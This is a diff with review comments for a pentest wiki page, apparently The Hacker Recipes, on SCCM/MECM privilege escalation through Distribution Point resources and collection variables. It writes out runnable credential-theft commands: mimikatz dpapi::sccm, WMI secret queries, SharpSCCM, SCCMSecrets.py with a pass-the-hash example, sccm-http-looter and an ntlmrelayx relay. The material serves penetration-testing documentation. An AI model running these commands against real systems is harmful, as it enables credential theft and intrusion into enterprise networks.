docs/src/ad/movement/sccm-mecm/privilege-escalation.md

```diff
@@ -1,201 +1,241 @@
+mimikatz # dpapi::sccm
 
-```powershell
-SharpSCCM.exe get secrets
+# Native Powershell
+Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_NetworkAccessAccount
 ```
-
 :::
 
 
-#### Device Collection variables
+#### Distribution Point resources
+
+By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.
 
-Devices enrolled in an SCCM environment can be grouped by collection. These exist by default, but administrators can create custom collections (for example "Server 2012 devices"), and add variables for these collections that will be used, for example, during application deployement to check some conditions. These variables may very well contain credentials and be found locally on the clients.
+Resources can be downloaded through the SMB or HTTP protocols.
+
+Note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.
 
 ::: tabs
 
-=== UNIX-based
+=== HTTP
 
-_At the time of writing (February 2024), no solution exists to perform this attack from a UNIX-like machine._
+Regarding the HTTP protocol, [SCCMSecrets.py](https://github.com/synacktiv/SCCMSecrets/) can be used to index and download files from Distribution Points.
 
+Not providing any credentials will attempt to exploit anonymous access on the Distribution Point.
 
-=== From Windows
+```bash
+# Attempts to exploit anonymous access to index and download files
+python3 SCCMSecrets files -dp http://mecm.sccm.lab
 
-From a Windows machine enrolled in the SCCM environment, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) (C#) or a PowerShell command can be used with, administrative rights, to extract the collection variables locally.
+# Downloads files with specific extensions 
+python3 SCCMSecrets.py files -dp http://mecm.sccm.lab -u 'dave' -H 'F7EB9C06FAFAA23C4BCF22BA6781C1E2' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'
 
-```powershell
-# Locally from WMI 
+# Having indexed files first, downloads specific files from the Distribution Point
+python3 SCCMSecrets.py files -dp http://mecm.sccm.lab -u 'dave' -p 'dragon' --urls to_download.lst
+```
 
-Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_CollectionVariable
+If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) can also be used. It may be faster as it is written in Golang.
 
-# Locally from CIM store
-SharpSCCM.exe local secrets -m disk
+```bash
+./sccm-http-looter -server 10.10.10.10
+```
 
-# Locally from WMI
-SharpSCCM.exe local secrets -m wmi
+This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account. See [the following ntlmrelayx PR](https://github.com/fortra/impacket/pull/1832).
+```bash
+python3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug
 ```
 
-:::
+=== SMB
```

Comment:
Hum I'm not sure about the two tabs HTTP/SMB as SCCMSecrets is also able to retrieve the secrets via SMB, if I don't tell a mistake ?
I think it is preferable to keep the usual separation UNIX/Windows, and indicate the dedicated tools into each sections. And maybe, into each tabs devided between HTTP and SMB.

Reply:
SCCMSecrets only performs secrets retrieval via HTTP for the moment, I've not implemented the SMB protocol as cmloot.py does this pretty well :) but I followed your suggestion and put back the usual Unix/Windows separation for coherence, and added HTTP/SMB subsection in the tabs

Reply:
Oh ok, sorry for the mistake ! By reading the article on the Synacktiv's blog I thought it was possible to parse the SMB share as well